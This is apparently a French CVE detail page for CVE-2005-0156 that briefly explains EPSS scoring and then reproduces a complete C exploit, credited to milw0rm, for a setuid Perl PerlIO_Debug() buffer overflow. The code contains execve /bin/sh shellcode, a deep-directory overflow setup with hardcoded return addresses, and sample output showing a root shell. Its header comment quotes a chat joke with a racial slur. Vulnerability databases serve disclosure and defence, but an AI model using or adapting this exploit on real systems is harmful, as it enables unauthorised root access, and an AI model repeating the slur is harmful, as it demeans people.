CVE-2005-0156 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

/* * Copyright Kevin Finisterre * * Setuid perl PerlIO_Debug() overflow * * Tested on Debian 3.1 perl-suid 5.8.4-5 * * (11:07:20) *corezion:* who is tha man with tha masta plan? * (11:07:36) *corezion:* a nigga with a buffer overrun * (11:07:39) *corezion:* heh * (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html) * * cc -o ex_perl2 ex_perl2.c -std=c99 * * kfinisterre@jdam:~$ ./ex_perl2 * Dirlen: 1052 * Charlie Murphy!!!@#@ * sh-2.05b# id * uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root) * */ #include <stdlib.h> #include <stdio.h> #include <strings.h> #include <string.h> #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> int main(int *argc, char **argv) { int len = 23; int count = 5; char malpath[10000]; char tmp[256]; char *filler; char *ptr; unsigned char code[] = /* 0xff-less execve() /bin/sh by anathema <[email protected]> Linux/IA32 0xff-less execve() shellcode. */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // setuid(0) - fix for redhat based machines "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17(%ebx),%eax "\xcd\x80" // int $0x80 "\x89\xe6" /* movl %esp, %esi */ "\x83\xc6\x30" /* addl $0x30, %esi */ "\xb8\x2e\x62\x69\x6e" /* movl $0x6e69622e, %eax */ "\x40" /* incl %eax */ "\x89\x06" /* movl %eax, (%esi) */ "\xb8\x2e\x73\x68\x21" /* movl $0x2168732e, %eax */ "\x40" /* incl %eax */ "\x89\x46\x04" /* movl %eax, 0x04(%esi) */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\x07" /* movb %al, 0x07(%esi) */ "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\xb0\x0b" /* movb $0x0b, %al */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ "\xcd\x80" /* int $0x80 */; chdir("/tmp/"); // do one less char than usual for RedHat filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"; for (int x=0; x<4; x=x+1) { mkdir(filler, 0777); chdir(filler); // do one less char than usual for RedHat count = count + 255; } memset(tmp,0x41,len); count = count + len; ptr = tmp+len; ptr = putLong (ptr, 0xbffffb6a); // frame 11 ebp ptr = putLong (ptr, 0xbffffb6a); ptr = putLong (ptr, 0xbffffb6a); strcat(tmp, "/"); mkdir(tmp, 0777); chdir(tmp); printf ("Dirlen: %d\n", count); FILE *perlsploit; char perldummyfile[] = { "#!/usr/bin/sperl5.8.4\n" "# \n" "# Be proud that perl(1) may proclaim: \n" "# Setuid Perl scripts are safer than C programs ...\n" "# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n" }; if(!(perlsploit = fopen("take_me.pl","w+"))) { printf("error opening file\n"); exit(1); } fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit); fclose(perlsploit); getcwd(malpath, 10000); strcat(malpath, "/"); strcat(malpath, "take_me.pl"); printf("Charlie Murphy!!!@#@\n"); chmod(malpath,0755); setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1); setenv("PERL5LIB", code, 1); execv(malpath,(char *) NULL); } /* * put a address in mem, for little-endian * */ char* putLong (char* ptr, long value) { *ptr++ = (char) (value >> 0) & 0xff; *ptr++ = (char) (value >> 8) & 0xff; *ptr++ = (char) (value >> 16) & 0xff; *ptr++ = (char) (value >> 24) & 0xff; return ptr; } // milw0rm.com [2005-02-07]